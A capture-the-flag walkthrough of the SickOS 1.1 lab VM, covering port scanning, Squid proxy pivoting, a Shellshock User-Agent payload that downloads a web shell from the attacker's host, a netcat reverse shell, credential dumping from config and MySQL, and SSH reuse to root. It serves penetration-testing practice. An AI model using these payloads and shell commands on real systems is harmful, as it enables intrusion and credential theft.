SickOS 1.1 Solution

Name........: SickOs1.1
Date Release: 11 Dec 2015
Author......: D4rk
Series......: SickOs
Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt
Tester(s)...: h1tch1
Twitter.....: https://twitter.com/D4rk36

DESCRIPTION

This is a quick walk through/solution for SickOS v1.1 which can be downloaded below. Despite there being several write ups for this challenge, I decided to post my own methods of attack and share my mindset going through this challenge in hopes that it may help others.

DOWNLOAD

https://www.vulnhub.com/entry/sickos-11,132/

DISCOVERY

# netdiscover -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                            7 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 402                                                                              _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 192.168.1.122   00:0c:29:16:91:9d    01    042   VMware, Inc.                                                                                                                                                                         

ENUMERATION

Now that we have the IP address of our new VM, we can start enumerating open ports/services to determine our plan of attack. For this phase, I always rely on “Sn1per” which can be downloaded here: https://github.com/1N3/Sn1per

# ./sniper 192.168.1.0/24
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.5 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 122.1.168.192.in-addr.arpa: NXDOMAIN

Host 122.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.122 (192.168.1.122) 56(84) bytes of data.

--- 192.168.1.122 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:27 EST
Nmap scan report for 192.168.1.122
Host is up (0.00028s latency).
Not shown: 65532 filtered ports, 1 closed port
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open  http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 00:0C:29:16:91:9D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.1.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.27 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:28 EST
Nmap scan report for 192.168.1.122
Host is up (0.00029s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:16:91:9D (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.1.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.01 seconds

################################### Running Intrusive Scans ########################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 opened... running tests...

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:31 EST
Nmap scan report for 192.168.1.122
Host is up (0.00028s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
MAC Address: 00:0C:29:16:91:9D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds

PLAN OF ATTACK

Now that we’ve enumerated all open ports and services, we can see that our only options for attack vectors are: 1) Exploiting or brute forcing SSH
2) Attempting to connect to the Squid open proxy server to pivot off of Since our brute force of common usernames and passwords already failed and there doesn’t seem to be any known exploits for this version of SSH, our only option seems to be to leverage the proxy and see what else we can find. To do this, I used Burpsuite proxy and added upstream proxies back to the SickOS IP address: After Burpsuite is configured, we can now browse to the IP address via a web browser connected to Burpsuite in order to connect to local ports that may be open locally on the box. As we can see below, the root of the web server can be reached locally and contains the following code:

GET http://192.168.1.122/ HTTP/1.1
Host: 192.168.1.122
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3pqr9365an8p7rktmep2hjauo2

HTTP/1.0 200 OK
Date: Sat, 02 Jan 2016 20:00:14 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.21
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html
X-Cache: MISS from localhost
X-Cache-Lookup: MISS from localhost:3128
Via: 1.0 localhost (squid/3.1.19)
Connection: close

< h1 >
BLEHHH!!!
< /h1 >

Since there isn’t any linked content in the root web page, we’ll need to manually brute force files and directories in order to discover any hidden content. This can be done using Burpsuite or DirBuster or any other web content discovery methods. After some time, you should be able to discover a robots.txt page. This reveals some other web content that may be helpful to us.

ROBOTS.TXT

GET http://192.168.1.122/robots.txt HTTP/1.1
Host: 192.168.1.122
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.122/shell.php?act=sql&sql_login=root&[email protected]&sql_server=localhost&sql_port=3306&sql_db=mysql&sql_tbl=user
Cookie: PHPSESSID=3pqr9365an8p7rktmep2hjauo2
Connection: close

HTTP/1.0 200 OK
Date: Sat, 02 Jan 2016 19:58:29 GMT
Server: Apache/2.2.22 (Ubuntu)
Last-Modified: Sat, 05 Dec 2015 00:35:02 GMT
ETag: "40ca5-2d-5261bcb6b1d0f"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 45
Content-Type: text/plain
X-Cache: MISS from localhost
X-Cache-Lookup: MISS from localhost:3128
Via: 1.0 localhost (squid/3.1.19)
Connection: close

User-agent: *
Disallow: /
Dissalow: /wolfcms

After discovering the wolfcms site, I was unable to find any exploitable web vulnerabilities 🙁 However, in the process of my web content brute force, I did notice a /cgi-bin/ directory and decided to continue my brute force to enumerate any scripts here.

SHELLSHOCK EXPLOIT

After discovering /cgi-bin/status, I attempted to exploit Shellshock via Burpsuite using a method I previous blogged about here since Shellshock affected many cgi and perl programs.

GET http://192.168.1.122/cgi-bin/status HTTP/1.1
Host: 192.168.1.122
User-Agent: () { :;}; /bin/bash -c "wget http://192.168.1.149/c100.txt -O /var/www/shell.php"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET http://192.168.1.122/shell.php HTTP/1.1
Host: 192.168.1.122
User-Agent: test
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

REMOTE CONFIRMATION

==> /var/log/apache2/crowdshield_access.log <==
192.168.1.1 - - [02/Jan/2016:12:13:11 -0500] "GET /.testing/shellshock.txt?vuln=4 HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:11 -0500] "GET /.testing/shellshock.txt?vuln=5 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:12 -0500] "GET /.testing/shellshock.txt?sleep=1 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:15 -0500] "GET /.testing/shellshock.txt?sleep=3 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:16 -0500] "GET /.testing/shellshock.txt?vuln=16?user=www-data HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:17 -0500] "GET /.testing/shellshock.txt?vuln=17?user=www-data HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:18 -0500] "GET /.testing/shellshock.txt?vuln=18?pwd=/usr/lib/cgi-bin HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:18 -0500] "GET /.testing/shellshock.txt?sleep=6 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:18 -0500] "GET /.testing/shellshock.txt?vuln=19?pwd=/usr/lib/cgi-bin HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:19 -0500] "GET /.testing/shellshock.txt?vuln=20?shadow= HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:19 -0500] "GET /.testing/shellshock.txt?vuln=21?shadow= HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:20 -0500] "GET /.testing/shellshock.txt?sleep=9 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:20 -0500] "GET /.testing/shellshock.txt?vuln=22?uname=Linux HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:21 -0500] "GET /.testing/shellshock.txt?vuln=23?uname=Linux HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:22 -0500] "GET /.testing/shellshock.txt?vuln=24?shell= HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:22 -0500] "GET /.testing/shellshock.txt?vuln=25?shell= HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:22 -0500] "GET /.testing/shellshock.txt?vuln=26?shell= HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:22 -0500] "GET /.testing/shellshock.txt?vuln=27?shell= HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"

PRIVILEGE ESCALATION

After pulling down the backdoor script from my remote server, I now had a full remote web shell with command execution and SQL command execution. From here, I went through the normal routes of privilege escalation on Linux by gathering information from the target and re-assessing my attack vectors.

$ uname -a 
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux


$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

NETCAT REVERSE SHELL

Even though I had a full remote web shell, I decided to spawn a netcat reverse shell for easier command line access.

$ nc -lvvp 31337 # ON LOCAL HOST
$ nc 192.168.1.149 31337 -e /bin/bash # ON REMOTE HOST

ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf

cat config.php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');
define('TABLE_PREFIX', '');

MYSQL DATA DUMP

Now that I had the username/password for MySQL, I leveraged my web shell in order to gain access to the DB and dump the following creds.

use wolf; SELECT * FROM user;

id	name	email	username	password	salt	language	last_login	last_failure	failure_count	created_on	updated_on	created_by_id	updated_by_id	Action
	1	Administrator	[email protected]	admin	3a1be46a798dce0d880f633ce195b676839a0ce344c917a7ea1270816dcb649ce1e2b811b56fe93c9d3c4e679151180129ee9483ea39bff4d4578c4be6c77e1f	6806b774443f2c34231eceddf156a42d3c26a2b5219ee9d55f5e3c9aea534167	en	2015-12-05 07:47:16	NULL	0	2015-12-05 06:25:06	2015-12-05 07:47:16	1	NULL	Delete Edit 


use mysql; SELECT * FROM user;

	Host	User	Password	Select_priv	Insert_priv	Update_priv	Delete_priv	Create_priv	Drop_priv	Reload_priv	Shutdown_priv	Process_priv	File_priv	Grant_priv	References_priv	Index_priv	Alter_priv	Show_db_priv	Super_priv	Create_tmp_table_priv	Lock_tables_priv	Execute_priv	Repl_slave_priv	Repl_client_priv	Create_view_priv	Show_view_priv	Create_routine_priv	Alter_routine_priv	Create_user_priv	Event_priv	Trigger_priv	Create_tablespace_priv	ssl_type	ssl_cipher	x509_issuer	x509_subject	max_questions	max_updates	max_connections	max_user_connections	plugin	authentication_string	Action
	localhost	root	*A7A20B93EC076311A63BF86B5C705B25C054DD77	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 
	sickos	root	*A7A20B93EC076311A63BF86B5C705B25C054DD77	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 
	127.0.0.1	root	*A7A20B93EC076311A63BF86B5C705B25C054DD77	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 
	::1	root	*A7A20B93EC076311A63BF86B5C705B25C054DD77	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 
	localhost	debian-sys-maint	*CB98094782C386F2459D65D97B17D1DE15D1654B	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	N	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 

 

GAINING REMOTE SSH SHELL

Since I was able to enumerate all valid users (sickos) and some passwords ([email protected]), I decided to use this info to see if I could login via SSH and sure enough, this worked!

[email protected]:~# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Jan  3 01:20:33 IST 2016

  System load:  0.0               Processes:           117
  Usage of /:   4.7% of 28.42GB   Users logged in:     0
  Memory usage: 11%               IP address for eth0: 192.168.1.122
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

128 packages can be updated.
96 updates are security updates.

New release '14.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Sep 22 08:32:44 2015
[email protected]:~$ 

[email protected]:~$ cd /home
[email protected]:/home$ ls
sickos
[email protected]:/home$ cd sickos/
[email protected]:~$ ls
[email protected]:~$ ls -lah
total 32K
drwxr-xr-x 3 sickos sickos 4.0K Jan  3 01:21 .
drwxr-xr-x 3 root   root   4.0K Sep 22 08:19 ..
-rw------- 1 sickos sickos   13 Sep 22 09:20 .bash_history
-rw-r--r-- 1 sickos sickos  220 Sep 22 08:19 .bash_logout
-rw-r--r-- 1 sickos sickos 3.5K Sep 22 08:19 .bashrc
drwx------ 2 sickos sickos 4.0K Sep 22 08:32 .cache
-rw------- 1 sickos sickos   28 Jan  3 01:21 .mysql_history
-rw-r--r-- 1 sickos sickos  675 Sep 22 08:19 .profile

[email protected]:~$ cat .bash_history | less
 sudo su

GAME OVER

Now that I had a valid shell, one of the first things I tried was sudoing to “root”. Luckily it worked and from here, I now had full control of the server and could view the flag!

[email protected]:~$ sudo su
[sudo] password for sickos: 

[email protected]:/home/sickos# whoami
root

[email protected]:/home/sickos# cd /root

[email protected]:~# ls
a0216ea4d51874464078c618298b1367.txt

[email protected]:~# cat a0216ea4d51874464078c618298b1367.txt 
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


[email protected]:~# 

[email protected]

Leave a Reply